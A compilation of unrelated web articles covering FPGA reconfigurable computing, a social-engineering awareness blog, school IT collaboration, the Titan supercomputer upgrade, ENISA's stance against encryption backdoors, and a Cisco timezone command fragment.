Despite all the all the recent hoopla about GPGPUs and eight-core CPUs, proponents of reconfigurable computing continue to sing the praises of FPGA-based HPC. The main advantage of reconfigurable computing, or RC for short, is that programmers are able to change the circuitry of the chip on the fly. Thus, in theory, the hardware can be matched to the software, rather than the other way around. While there are a handful of commercial offerings from companies such as Convey Computer, XtremeData, GiDel, Mitrionics, and Impulse Accelerated Technologies, RC is still an area of active research.
In the U.S., the NSF Center for High-Performance Reconfigurable Computing (CHREC, pronounced “shreck”), acts as the research hub for RC, bringing together more than 30 organizations in this field. CHREC is run by Dr. Alan George, who gave an address at the SC09 Workshop on High-Performance Reconfigurable Computing Technology and Applications (HPRCTA’09) on November 15. We got the opportunity to ask Dr. George about the work going on at the Center and what he thinks RC technology can offer to high performance computing users.
HPCwire: FPGA-based reconfigurable computing has captured some loyal followers in the HPC community. What are the advantages of FPGAs for high-performance computing compared to fixed-logic architectures such as CPUs, GPUs, the Cell processor?
Alan George: HPC is approaching a crossroads in terms of enabling technologies and their inherent strengths and weaknesses. Goals and challenges in three principal areas are vitally important yet increasingly in conflict: performance, productivity, and sustainability. For example, HPC machines lauded in the upper tier of the TOP500 list as most powerful in the world are remarkably high in performance yet also remarkably massive in size, energy, heat, and cost, all featuring programmable, fixed-logic devices, for example, CPU, GPU, Cell. Meanwhile, throughout society, energy cost, source, and availability are a growing concern. As life-cycle costs of energy and cooling rise to approach and exceed that of software and hardware in total cost of ownership, these technologies may become unsustainable.
By contrast, numerous research studies show that computing with reconfigurable-logic devices — FPGAs, et al. — is fundamentally superior in terms of speed and energy, due to the many advantages of adaptive, customizable hardware parallelism. Common sense confirms this comparison. Programmable fixed-logic devices no matter their form feature a “one size fits all” or “Jack of all trades” philosophy, with a predefined structure of parallelism, yet attempting to support all applications or some major subset. In contrast, the structure of parallelism in reconfigurable-logic devices can be customized, that is, reconfigured, for each application or task on the fly, being versatile yet optimized specifically for each problem at hand. With this perspective, fixed-logic computing and accelerators are following a more evolutionary path, whereas RC is relatively new and revolutionary.
It should be noted that RC, as a new paradigm of computing, is broader than FPGA acceleration for HPC. FPGA devices are the leading commercial technology available today that is capable of RC, albeit not originally designed for RC, and thus FPGAs are the focal point for virtually all experimental research and commercial deployments, with a growing list of success stories. However, looking ahead more broadly, reconfigurable logic may be featured in future devices with a variety of structures, granularities, functionalities, etc., perhaps very similar to today’s FPGAs or perhaps quite different.
HPCwire: What role, or roles, do you see for RC technology in high performance computing and high performance embedded computing? Will RC be a niche solution in specific application areas or do you see this technology being used in general-purpose platforms that will be widely deployed?
George: Naturally, as a relatively new paradigm of computing, RC has started with emphasis in a few targeted areas, for example, aerospace and bioinformatics, where missions and users require dramatic improvement only possible by a revolutionary approach. As principal challenges — performance, productivity, and sustainability — become more pronounced, and as R&D in RC progresses, we believe that the RC paradigm will mature and expand in its role and influence to eventually become dominant in a broad range of applications, from satellites to servers to supercomputers. We are already witnessing this trend in several sectors of high-performance embedded computing. For example, in advanced computing on space missions, high performance and versatility are critical with limited energy, size, and weight. NASA, DOD, and other space-related agencies worldwide are increasingly featuring RC technologies in their platforms, as is the aerospace community in general. The driving issues in this community — again performance, productivity, and especially sustainability — are becoming increasingly important in HPC.
HPCwire: In the past couple of years, non-RC accelerators like the Cell processor and now, especially, general-purpose GPUs have been making big news in the HPC world, with major deployments planned. What has held back reconfigurable computing technology in this application space?
George: There are several reasons why Cell and GPU accelerators are more popular in HPC at present. Perhaps most obviously, they are viewed as inexpensive, due to leveraging of the gaming market. Vendors have invested heavily, both marketing and R&D, to broaden the appeal of these devices for the HPC community. Moreover, in terms of fundamental computing principles, they are an evolutionary development in device architecture, and as such represent less risk. However, we believe that inherent weaknesses of any fixed-logic device technology … in terms of broad applicability at speed and energy efficiency, will eventually become limiting factors.
By contrast, reconfigurable computing is a relatively new and immature paradigm of computing. Like any new paradigm, there are R&D challenges that must be solved before it can become more broadly applicable and eventually ubiquitous. With fixed-logic computing, the user and application have no control over underlying hardware parallelism; they simply attempt to exploit as much as the manufacturer has deemed to provide. With reconfigurable-logic computing, the user and application define the hardware parallelism, featuring wide and deep parallelism as appropriate, with selectable precision, optimized data paths, etc., up to the limits of total device capacity. This tremendous advantage in parallel computing potency comes with the challenge of complexity. Thus, as is natural for any new paradigm and set of technologies, design productivity is an important challenge at present for RC in general and FPGA devices in particular, so that HPC users, and others, can take full advantage without having to be trained as electrical engineers.
It should be noted that this life-cycle is commonplace in the history of technology. An established technology is dominant for many years; it experiences growth over a long period of time from evolutionary advances, and one day it is partially or wholly supplanted by a new, revolutionary technology, but only after that new technology has navigated a long and winding road of research and development. Productivity is often a key challenge for a new IT technology, learning how to effectively harness and exploit the inherent advantages of the new approach.
HPCwire: What do you see on the horizon that could propel reconfigurable computing into a more mainstream role?
George: There are two major factors on the horizon that we believe will dramatically change the landscape. One factor is the trend for performance, productivity, and sustainability borne by growing concerns with conventional technologies about speed versus energy consumption, which increasingly favors RC. The conventional model of computing with fixed-logic multicore devices is limiting in terms of performance per unit of energy as compared to reconfigurable-logic devices. However, RC is viewed by many as lagging in effective concepts and tools for application development by domain scientists and other users to harness this potency without special skills. Thus, the second factor is taming this new paradigm of computing and innovations in its technologies, so that it is amenable to a broader range of users. In this regard, many vendors and research groups are conducting R&D and developing new concepts, tools, and products to address this challenge. In the future, RC will become more important for a growing set of missions, applications, and users and, concomitantly, it will become more amenable to them, so that productivity is maximized alongside performance and sustainability.
HPCwire: The new Novo-G reconfigurable computing system at the NSF Center for High-Performance Reconfigurable Computing (CHREC) has been up and running for just a few months. Can you tell us about the machine and what you hope to accomplish with it?
George: Novo-G became operational in July of this year and is believed to be the most powerful RC machine ever fielded for research. Its size, cooling and power consumption are modest by HPC standards, but they hide its computational superiority. For example, in our first application experiment working with domain scientists in computational biology, performance was sustained with 96 FPGAs that matched that of the largest machines on the NSF TeraGrid, yet provided by a machine that is hundreds of times lower in cost, power, cooling, size, etc.
Housed in three racks, Novo-G consists of 24 standard Linux servers, plus a head node, connected by DDR InfiniBand and GigE. Each server features a tightly-coupled set of four FPGA accelerators on a ProcStar-III PCIe board from GiDEL supported by a conventional multicore CPU, motherboard, disk, etc. Each FPGA is a Stratix-III E260 device from Altera with 254K logic elements, 768 18×18 multipliers, and more than 4GB of DDR2 memory directly attached via three banks. Altogether, Novo-G features 96 of these FPGAs, with an upgrade underway that by January will double its RC capacity to 192 FPGAs via two coupled RC boards per server.
The purpose of Novo-G is to support a variety of research projects in CHREC related to RC performance, productivity and sustainability. Founded in 2007, CHREC is a national research center under the auspices of the I/UCRC program of the National Science Foundation and consists of more than 30 academic, industry and government partners working collaboratively on research in this field. In addition, several new collaborations have been inspired by Novo-G, with other research groups, for example, Boston University and the Air Force Research Laboratory, as well as tools vendors such as Impulse Accelerated Technologies and Mitrionics.
HPCwire: Can you talk about a few of the projects at CHREC that look especially promising?
George: On-going research projects at the four university sites of CHREC — the University of Florida, Brigham Young University led by Dr. Brent Nelson, George Washington University led by Dr. Tarek El-Ghazawi, and Virginia Tech led by Dr. Peter Athanas — fall into four categories: productivity, architecture, partial reconfiguration, and fault tolerance. In the area of productivity, several projects are underway, crafting novel concepts for design of RC applications and systems, including new methods and tools for design formulation and prediction, hardware virtualization, module and core reuse, design verification and optimization, and programming with high-level languages. With respect to architecture, researchers are working to characterize and optimize new and emerging devices — both fixed and reconfigurable logic — and systems, as well as methods to promote autonomous hardware reconfiguration. Both of these project areas of productivity and architecture relate well to HPC.
Meanwhile, one of the unique features of some RC devices is their ability to reconfigure portions of the hardware of the chip while other portions remain unchanged and thus operational, and this powerful feature involves many research and design challenges being studied and addressed by several teams. Last but not least, as process densities increase and become more susceptible to faults, environments become harsher, and resources become more prone to soft or hard errors, research challenges arise in fault tolerance. In this area, CHREC researchers are developing device- and system-level RC concepts and architectures to support scenarios that require high performance, versatility, and reliability with low power, cooling, and size, be it for outer space or the HPC computer room. | <urn:uuid:c756bdae-6b45-48ce-9111-29875f967431> | CC-MAIN-2017-04 | https://www.hpcwire.com/2009/11/20/reconfigurable_computing_research_pushes_forward/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560284352.26/warc/CC-MAIN-20170116095124-00358-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.947804 | 2,571 | 2.609375 | 3 |
Halloween is a time when people of all ages dress up as something spooky that they’re really not. For the scariest of hackers, every day is like a reverse Halloween as they try to scam victims by pretending to be someone safe and trustworthy--a persona that they’re really not. This Halloween, don’t get tricked by the haunted hack!
Tricks of this nature are categorized as social engineering, and unlike a child dressed as a ghoul on Halloween, scams of the social-engineering variety are much more difficult to spot. When it comes to protecting yourself from these targeted scams, it’s imperative that you know what to look for. Also, in the same way you check your kid’s trick-or-treat candy for anything that might be harmful, you need to view unsolicited digital communications with a degree of healthy skepticism.
Unfortunately, social engineering tactics like phishing scams work, which is why hackers increasingly use them. This begs the question; why is it that users so easily fall for these scams, even if they’re aware of the security risks? Researchers from the University of Erlangen-Nuremberg in Germany sought to find this out by studying the reasons why people click on malicious links.
The findings were presented by Zinaida Benenson at the most recent Black Hat convention in Las Vegas. Benenson attributed the “success” of a malicious link to the hacker’s ability to understand the circumstances of the scam, and personalizing the link to appeal to their victim. “By a careful design and timing of the message, it should be possible to make virtually any person to click on a link, as any person will be curious about something, or interested in some topic, or find themselves in a life situation that fits the message content and context."
Translation; even with proactive training and education, the best employee could potentially click on a link if doing so fits into their current interests or piques their curiosity. ZDNet uses the example of a partygoer who attended a recent event and then receives an email containing a link to photos of the party. Naturally, the user will want to click on the link, regardless of where it’s from. In this example, the hacker effectively appeals to the natural curiosity of what might be contained within; when coupled with such personalized context, it’s almost guaranteed that they’ll click it.
Another example would be an employee who’s experiencing technical trouble with a workstation. They’ll then receive an email from “tech support” suggesting they click on a link and download remote access software. If the employee is frustrated and they can’t get their PC to work properly, they will follow the email’s instructions for two reasons: 1) The context fits the situation, and 2) People tend to trust tech support.
Like the work it takes to create an impressive Halloween costume, these hacks rely on a level of preparation and cunning by the hackers. This kind of personalized attention makes social engineering scams particularly challenging to protect oneself against.
Essentially, the possibilities for you and your employees to be tricked by spear phishing attacks and end-user errors are limitless, so long as a hacker knows how to appeal to what a user cares about. At the end of the day, having a staff that knows how to spot a trick, and a network that’s free from scary threats, is the greatest treat a business owner can ask for.
Have a safe and Happy Halloween from all of us at Nerds That Care. | <urn:uuid:7d11dd69-5245-4544-b6c4-360a82bce4f4> | CC-MAIN-2017-04 | https://nerdsthatcare.com/nerd-alerts/entry/this-halloween-dress-like-a-hacker-and-terrify-your-it-administrator | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560284429.99/warc/CC-MAIN-20170116095124-00046-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.938571 | 742 | 2.515625 | 3 |
As technology expands within school districts around the globe, educational organizations continue to face the challenges of bridging the gap between their IT departments and curriculum teams. While IT seeks to have control over tools and network resources, educators desire to provide technology resources to their teachers and students in an effort to improve personalized learning. Can they work together? Is there an opportunity to create an environment where both IT and educators can collaborate? In today’s session, presenters and Ridley School District IT experts, Don Otto and Ray Howanski, showed it’s possible.
Ridley School District is comprised of nine schools, 5,600 students and 600 faculty and administrators. They have 6,000 iPads, 1,300 Mac OS laptops and 530 Mac OS desktops, along with other devices. They have productivity Apps, a SIS and LMS, Jamf as a mobile device management (MDM) tool and a slew of instructional apps. They have 10, 40GB WAN connections, 476 wireless Aps and redundant core routers. And with a complex server infrastructure, and only a small support team (8 building-level techs, 5 IS/IT support staff, 1 Apple repair tech and 1 network engineer), it’s no surprise they want to keep a handle on their vast network.
With the massive amount of infinite information available for schools, there’s no doubt that there’s a need for IT to control that gateway; however, educators want access and availability to utilize this infinite information to better their instruction. From the curriculum perspective, they know more access means better communication for students and teachers, along with more powerful presentation tools. But they know it’s still essential to involve IT to avoid spam or privacy breaches.
Additionally, instructionalists want the best product for each content and often cite what the sales person told them about the product – the reasons they can’t live without it or how easily the product is able to integrate into their current infrastructure. However, by bringing IT into these conversations, they’re able to get a better understanding of how this can realistically work within their district’s infrastructure.
Otto and Howanski said that while the two groups were far apart, there was room to grow together. Through collaboration and understanding, they design sustainable learning environments.
“To have a sustainable learning environment, we need to continually have this future- forward conversation,” Otto said.
All-in-all, by sharing goals, having open discussions before making decisions, and by providing ongoing, daily feedback to adjust conditions and knowledge changes, both IT and educators at Ridley were able to meet their individual needs and achieve results. | <urn:uuid:8177baac-cf3f-4ab6-9ac5-40a5ea933b2b> | CC-MAIN-2017-04 | https://www.jamf.com/blog/bringing-it-and-curriculum-together-to-get-results/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560284429.99/warc/CC-MAIN-20170116095124-00046-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.956366 | 547 | 3.046875 | 3 |
Supercomputing takes new direction at Oak Ridge
- By Henry Kenyon
- Mar 29, 2012
An ongoing program to upgrade the Jaguar supercomputer at the Oak Ridge National Laboratory in Tennessee will not only result in a much more powerful computer, it will also create a new and unique research tool. When it is complete, the updated machine, which will be called Titan, will be able to perform calculations at speeds approaching 20 petaflops, reclaiming its title as the world's fastest computer.
The Titan effort is the beginning of a new architecture design path for more much more power and energy-efficient computers, said Jack Wells, director of science at the laboratory’s Oak Ridge Leadership Computing Facility (OLCF). Graphics accelerators are key to this new approach because they provide great processing power in a very efficient power-and-size combination. There are other options for achieving efficiency, but this is Oak Ridge’s current approach, he told GCN.
One reason for new architecture considerations is to help increase performance. Clock speeds for microchips peaked in 2004 when it became impractical to mass produce faster chips, Wells said.
The making of supercomputing champ
Since then, manufacturers and computer designers have moved onto multicore methods with multiple chips operating in parallel to achieve improved performance. “If clock speed doesn’t increase, you see an increase in parallelism,” he said.
But although there is an increase in parallel processing for high-performance computing, general-purpose processors are not energy efficient. Increased parallelism requires better performance and lower energy consumption, Wells said. This is one reason that supercomputer designs are now relying on hardware such as the Nvidia graphical processing units and Intel multicore processors, he added.
GPUs act as accelerators to speed up computer performance while staying within the same physical footprint and power envelope, Wells said. The upgrades during the Jaguar transition to Titan will push the machine’s processing speed up in increments from 10 to 20 and perhaps 30 petalops, he said.
The upgrade and transition to Titan is part of the Energy Department’s user facility concept. The department meets its mission by providing large-scale, unique facilities and systems that university and corporate computers cannot replicate, Wells said. The Oak Ridge supercomputing facility falls under the department’s mandate for “big science” operations, he added.
DOE provides its facilities to researchers through calls for proposals. At the OLCF, the most compelling research projects that require the processing and modeling power of Jaguar/Titan are considered, Wells said. This process makes the facility reliant on user proposals. “We’re not executing a research program; we’re executing a user program,” he said.
When the Titan program was proposed in 2009, there was some question within DOE about whether any users would be able to use such a powerful computer, Wells said. The primary challenge was to establish that a variety of scientific software could run on the new machine.
Some of the software codes that run on Titan include, S3D, which is used in the direct numerical study of combustion; and De Novo, software that models radiation transport — a critical part of the work at Oak Ridge because it is used to model neutron transfer in reactor cores. Other types of scientific software model everything from molecular dynamics to atmospheric movements.
The software will run on Titan to support a variety of government, academic and commercial research projects. These include an effort to better understand turbulent fuel combustion run by the Sandia National Laboratory in New Mexico. This kind of research is hard because modeling the combustion of chemically complex fuels under high pressures is difficult, Wells said.
The Oak Ridge/Sandia project slated to run on Titan is part of a federal program to study how efficiently biofuels combust. Results of the modeling software will affect how commercial industry designs and studies combustion, Wells said. He added that automobile manufacturers have proprietary software used in engine design, and data from tests such as this will be plugged into the company’s modeling computers.
Oak Ridge tried to keep its users happy during the recently completed first phase of the upgrade by minimizing downtime and moving more slowly with the transition. This was achieved by shutting down half of the computer for upgrades while keeping the other half up and running, Wells said. When the newly upgraded half was reactivated, an initial user launch allowed testing of the new system. During the acceptance period, when the initial Titan upgrade was being tested, users with large jobs were brought in to help stress test the system. The machine was then briefly taken down to fully upgrade the remaining portion, he said. | <urn:uuid:04b83855-dd81-4414-bcec-bf1790207364> | CC-MAIN-2017-04 | https://gcn.com/articles/2012/03/29/doe-jaguar-titan-supercomputer-upgrade.aspx | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279915.8/warc/CC-MAIN-20170116095119-00442-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.950368 | 954 | 3.171875 | 3 |
“History has shown that technology beats legislation, and criminals are best placed to capitalise on this opportunity,” the European Network and Information Security Agency (ENISA) noted in a recently released opinion paper on encryption.
The paper addresses the question of whether backdoors or key escrow schemes should be implemented in encryption solutions, so that law enforcement and security services are able to decrypt communication that could be vital to solving cases.
ENISA’s position is clear: the use of backdoors in cryptography is not a solution.
For one, criminals can simply switch to using cryptographic tools that do not have a backdoor, or create their own. Secondly, legitimate users are put at risk.
“There is a legitimate need to protect communications among individuals and between individuals and public and private organisations. Cryptography provides the electronic equivalent of letter cover, seal or rubber stamp and signature,” the agency noted.
“In the light of terror attacks and organised crime, law enforcement and intelligence services have requested to create means to circumvent these protection measures. While their aims are legitimate, limiting the use of cryptographic tools will create vulnerabilities that can in turn be used by terrorists and criminals, and lower trust in electronic services, which will eventually damage industry and civil society in the EU.”
Thirdly, as said at the beginning, technology moves at breakneck speed.
“New technologies which generate once off encryption keys between end users are now being deployed,” the agency pointed out. “These keys are not stored centrally by the operator. These types of technologies make lawful interception in a timely manner very difficult. There is every reason to believe that more technology advances will emerge that will continue to erode the possibility of identifying or decrypting electronic communications.”
Finally, it’s possible that a weakening of encryption technology may ultimately weaken other aspects of cryptology, as the same technology is used, for example, to create digital signatures. “The existence of back doors / key recovery mechanisms can also potentially undermine the authenticity of a document,” they added.
All in all, the agency pointed out many of the drawback previously noted by crypto experts and security professionals.
Earlier this year, European Data Protection Supervisor (EDPS) Giovanni Buttarelli also opined against backdoors in encryption tech. | <urn:uuid:ec482315-0df2-495b-abca-08a04eb9249b> | CC-MAIN-2017-04 | https://www.helpnetsecurity.com/2016/12/14/crypto-backdoors-bad-idea/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281421.33/warc/CC-MAIN-20170116095121-00074-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.938462 | 475 | 2.53125 | 3 |
Kalid Azad, the brains behind InstaCalc, (who is also a swell guy in general to talk to) runs a blog titled Better Explained. The name says it all as BE strives to explain concepts, software development tactics and tools, and even math topics in simple, image-based lessons. I’d like to highlight one of these posts as Worthwhile Reading: A visual Guide to Version Control.
If you’ve heard the name Subversion or Sourcesafe but had no idea what they were or wanted a better understanding of how these systems worked and their benefits, just clicky-click on that link. Here it is again if you missed your chance the first time.
Three popular Version Control Systems are listed below:
- Subversion (http://subversion.tigris.org/
- Git (http://git.or.cz/)
- MS Visual Sourcesafe (http://msdn.microsoft.com/en-us/vs2005/aa718670.aspx)
If after reading the Better Explained article you’re looking for more advanced write-ups you’ll probably find the series of articles, Source Control HOWTO, helpful and interesting from fellow University of Illinois alum, Eric Sink. | <urn:uuid:c05b00c9-363a-4eb2-9a8e-075013607a8d> | CC-MAIN-2017-04 | https://www.404techsupport.com/2008/08/understanding-version-control-systems/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279169.4/warc/CC-MAIN-20170116095119-00379-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.906224 | 262 | 2.640625 | 3 |
In our last blog series we discussed multiple access commands that can be configured on a router or a switch. These commands included cosmetic commands such as logging synchronous and exec-timeout that can be configured on the console port. We also discussed configuring security features such as banners that can be used for legal purposes.
For this discussion we will compare Telnet and Secure Shell protocol (SSH). Both protocols can be used for remote access but their differences are important to any network technician or engineer.
First, to gain remote access to the Virtual Terminal Teletype lines (VTY), a router or switch must be reachable with a given routed protocol. This would include IPv4 or IPV6. (This seems obvious but it will be quite useful later in a future discussion.) Additionally, for the access lines you must configure either a line password, or local user database for the way to authenticate to the device. In example 1 you will see our basic access to setup the default telnet lines to this router.
As you can see, a basic password has been configured. The other option (shown in example 2) is to use the local user database.
In either case, if someone need to gain access to this device they will have to login with the authentication type that was specified.
Second, by default Telnet is associated with the VTY lines. Telnet uses TCP port number 23 and is one of the most commonly used protocols for remote access. However, telnet doesn’t have any type of confidentiality. In other words, it has no encryption mechanism. Eavesdroppers can easily discover messages that are passed between two devices using telnet, in fact programs such as Wireshark or Ethereal can see the passwords inside the telnet packets. In example 3 you can see that the router on the right (ROUTER 0) is telneting to the router on the left (ROUTER 1). Notice that I created an enable password of cisco on ROUTER1.
Example 4 displays the vulnerability of telnet. As shown, I have a Wireshark looking at the messages that are going between these two routers. The frame that was captured shows inside the telnet data, the password cisco being sent in one of the messages.
(Ok, it says “cisc”, but frame 66 contains the letter “o” so with work, a skilled hacker or even a novice can see these messages sent in clear text.)
The other common application for remote access to Cisco routers and switches is Secure Shell protocol (SSH). SSH runs on TCP protocol number 22 and unlike telnet, does include encryption. SSH also uses a more commands for setup in comparison to telnet. The first necessary command is to configure a local user database as illustrated in example 2. The next command is mandatory, SSH needs to have a key for its connection. This key is derived from the ip domain-name command. Example 5 displays creating a unique (local) domain-name for the router.
After this is done you must generate a key. This is done with the command crypto key generate rsa. Examples 6 and 7 display two different ways to use the command it’s configuration for the rsa keys.
Example 6 is the full blown way of configuring the general key. Example 7 displays the more interactive version of this command. This is useful for those that don’t know which key size may be necessary for a given application. Also, demonstrated in example 8 is the crypto key zeroize command which will erase the key.
Next, you must enable an SSH version and apply it to the VTY Lines. First with the global configuration commands ip ssh version <1 or 2>, you can specify which version of ssh will be used for access. Second, you must configure the vty lines for authentication to the local database with the line command login local and specify that only ssh will be permited to access these lines with the command transport input ssh (transport input ssh telnet means only these two protocols will have access to the VTY lines. The default is transport input all for all types of protocols.) These commands are displayed in the next example.
The most common ssh client program used is called putty. It is a freeware application that is used for telnet, ssh and other programs. Example 10 demonstrates basic configuration and successful access of ssh via putty.
Example 11 below, is a contrast to example 4. You can see that the passwords aren’t shown and that the datagrams are encrypted above the layer 4 header. This gives SSH the advantage compared to telnet in all remote access scenarios.
This now concludes our comparison of Telnet vs SSH. You can clearly see the advantages of SSH and why it becoming a well recognized security standard and accepted practice in the computer networking industry. | <urn:uuid:c5058ea1-34d0-4797-a1bc-597ca3419f7b> | CC-MAIN-2017-04 | http://blog.globalknowledge.com/2009/06/10/telnet-vs-ssh/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560285289.45/warc/CC-MAIN-20170116095125-00313-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.909811 | 998 | 3.078125 | 3 |
The quest for clean and renewable power is increasing globally year by year. Governments are looking at ways to solve their energy crisis, and interconnecting power grids is one of those. The challenge with network interconnection is that AC grids at different frequencies cannot be directly connected. A high voltage direct current (HVDC) system allows the asynchronous interconnection of networks that operate at different frequencies or are otherwise incompatible. HVDC systems are also fast becoming the preferred technology for long distance power transmission in view of their advantages over HVAC transmission systems.
The first long distance HVDC transmission was in 1882, from Miesbach to Munich in Germany. 1.5kW was transmitted over a distance of 57 Km. Now the longest transmission is the Rio Madeira transmission link in Brazil which has a length of 2385km and sends 7.1GW of power.
In these 130 years the concept of Direct Current has again come into relevance with people realizing its advantages in long distance transmission, and how the problems that were faced earlier can be overcome. Thomas Edison popularized the concept of DC everywhere but it never really caught the imagination of the people. Now after numerous researches and new innovations in this field, the industries are again looking at HVDC to overcome the problems of HVAC transmission.
The average size of the High-Voltage Direct Current (HVDC) transmission systems has increased in recent years. The market for HVDC systems is also increasing with more and more countries getting involved in HVDC transmission.
HVDC offers various advantages to power transmission utilities. It is much cheaper and the losses are less for large distance transmission when compared to AC. One of its greatest advantages is that it allows power to be transferred from one AC grid to another having different frequencies. This allows grid linking between different regions following different grid frequencies.
The main concerns with HVDC are that its converter stations are expensive and multi-terminal systems are complex. There are many big players in the HVDC market, and they are coming up with innovative ideas to solve some of the issues concerning this market.
In HVDC the basic process at the transmitting end is to convert the AC to DC, and at the receiving end convert this DC back to AC. These conversions can be done by using rectifiers and inverters. The other important devices used in this are filters, thyristors, Insulated Gate Bipolar Transistor (IGBT) and Voltage Source Converter (VSC). There is a lot of research going on into VSCs because it is one of the key aspects to reduce losses. Power can be transmitted through overhead lines or undersea cables.
The report offers the Market Definition for HVDC transmission systems and identifies the key market drivers and restraints. A market analysis for the HVDC transmission systems Market, with region specific assessments and competition analysis on a global and regional scale have been carried out. Prospective opportunities and factors instrumental in changing the market scenarios have been analyzed in detail. An extensively researched competitive landscape section gives the profiles of major companies along with their share of markets, current strategies and key financial information. Macro and Micro factors that affect the HVDC transmission systems market on both a global and regional scale have been identified and analyzed. | <urn:uuid:183497e0-acbb-4f15-82e6-82dab941dc2b> | CC-MAIN-2017-04 | https://www.mordorintelligence.com/industry-reports/global-hvdc-transmission-systems-market-industry | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281069.89/warc/CC-MAIN-20170116095121-00433-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.953456 | 670 | 3.359375 | 3 |
Load Balancing is a technique (usually performed by load balancers) to spread work between many computers, processes, disks or other resources in order to get optimal resource utilization and decrease computing time. A load balancer can be used to increase the capacity of a server farm beyond that of a single server. It can also allow the service to continue even in the face of server down time due to server failure or server maintenance.
If your organization's servers run applications that are critical to your business, chances are that you'd benefit from an application delivery solution. Today's Web applications can be delivered to users anywhere in the world and the devices used to access Web applications have become quite diverse.
At a projected market of over $4B by 2010 (Goldman Sachs), virtualizationhas firmly established itself as one of the most importanttrends in Information Technology. Virtualization is expectedto have a broad influence on the way IT manages infrastructure.Major areas of impact include capital expenditure and ongoingcosts, application deployment, green computing, and storage.
The idea of load balancing is well defined in the IT world: A network device accepts traffic on behalf ofa group of servers, and distributes that traffic according to load balancing algorithms and the availabilityof the services that the servers provide. From network administrators to server administrators to applicationdevelopers, this is a generally well understood concept.
Application Delivery Controllers understand applications and optimize server performance - offloading compute-intensive tasks that prevent servers from quickly delivering applications. Learn how ADCs have taken over where load balancers left off.
White Paper Published By: Cisco
Published Date: May 15, 2015
This guide will provide the steps necessary to configure a Microsoft Fast Track Small Implementation cloud built on EMC VSPEX, which is built on Cisco Unified Computing System and EMC VNXe technologies.
Free Offer Published By: WANdisco
Published Date: Oct 15, 2014
In this Gigaom Research webinar, the panel will discuss how the multi-cluster approach can be implemented in real systems, and whether and how it can be made to work. The panel will also talk about best practices for implementing the approach in organizations.
White Paper Published By: Globalscape
Published Date: Jul 31, 2014
Downtime happens and often at the worst time possible. Organizations experiencing downtime face direct and indirect costs from the loss of critical systems. This whitepaper discusses a Globalscape survey of 283 IT professionals and end users revealing the frequency of unplanned downtime, the effects on organizations, including average costs, and what IT administrators can do to minimize core system failure.
White Paper Published By: IBM
Published Date: Jul 14, 2014
This paper discusses the importance of workloads when planning for your migration to the cloud. It also describes how a structured approach to cloud workload analysis can help you identify cloud initiatives that offer faster time to value, reduced migration risk and higher potential return.
Just 400 milliseconds - the blink of an eye - is too long for users to wait for a webpage to load. Discover the website performance bottlenecks that push visitors to your competition, and mitigation strategies that will drive marketing success.
White Paper Published By: SilverSky
Published Date: Apr 16, 2013
SilverSky operates a major hosted infrastructure dedicated to providing world-class enterprise messaging solutions. This whitepaper is an in-depth overview of our Hosted Microsoft Exchange architecture and how we implement best practices across systems management, testing, application deployment, infrastructure and security to provide increased productivity and reduced costs.
White Paper Published By: CenturyLink
Published Date: Nov 18, 2011
There are more people on earth than total IPv4 addresses, and they're expected to run out by the end of 2011. Preparing for the transition now can help you maintain business continuity during the changeover while taking advantage of immediate business benefits.
Internal testing only allows you to see potential issues from within your own controlled environment, and does not test for the countless different scenarios in which a customer could be accessing your site. Find out the benefits of external load testing. | <urn:uuid:fb3a55e1-6bbe-43f9-be8f-77cdb036ec90> | CC-MAIN-2017-04 | http://research.crn.com/technology/networking/load_balancing | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280483.83/warc/CC-MAIN-20170116095120-00461-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.906375 | 839 | 2.671875 | 3 |
Brute force attacks use exhaustive trial and error methods in order to find legitimate authentication credentials.
The brute force attack is a method of obtaining a user's authentication credentials. Authentication is the process of determining if a user is who he/she claims to be. It is commonly performed through the usage of usernames and passwords. Knowledge of the password is assumed to guarantee that the user is authentic. Each user initially registers (or is registered by someone else) using an assigned or self-declared password. On each subsequent use, the user must know and use the previously declared password.
Using brute force, attackers attempt combinations of the accepted character set in order to find a specific combination that gains access to the authorized area. Consider the following form.
Attackers can use brute force applications, such as password guessing tools and scripts, in order to try all the combinations of well-known usernames and passwords. Such applications may use default password databases or dictionaries that contain commonly used passwords or they may try all combinations of the accepted character set in the password field.
User identification is not always achieved with a username and password pair. Using a brute force tool makes it easy to find a legitimate session ID that appears in a URL (see Parameter Tampering). A session ID is an identification string used to associate specific Web pages with a specific user. The following is an example of such a session ID.
This is an example of a greeting card site that has a unique session ID for each greeting card. Using Brute Force applications, attackers may try thousands of session IDs embedded in a legitimate URL in an attempt to view greeting cards that they are not authorized to view.
It is relatively easy to find a legitimate key for an object id. For example, consider the URL:
In this example, the dynamic page requested by the browser is called
Displaymsg.asp and the browser sends the Web server the parameter
msgID with a value of
12345. An attacker may try brute force values for
msgID to try and read other users' messages. | <urn:uuid:8b35802a-efa3-4eaf-a2b1-88d34b5cd0bb> | CC-MAIN-2017-04 | https://www.imperva.com/Resources/Glossary?term=brute_force | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281202.94/warc/CC-MAIN-20170116095121-00121-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.883794 | 420 | 3.953125 | 4 |
clock timezone zone hours-offset [minutes-offset]
Here are explanations for each parameter: zone This is the name of the time zone to be displayed when standard time is in effect.
hours-offset This is the hours difference from UTC.
minutes-offset This is the (optional) minutes difference from UTC.
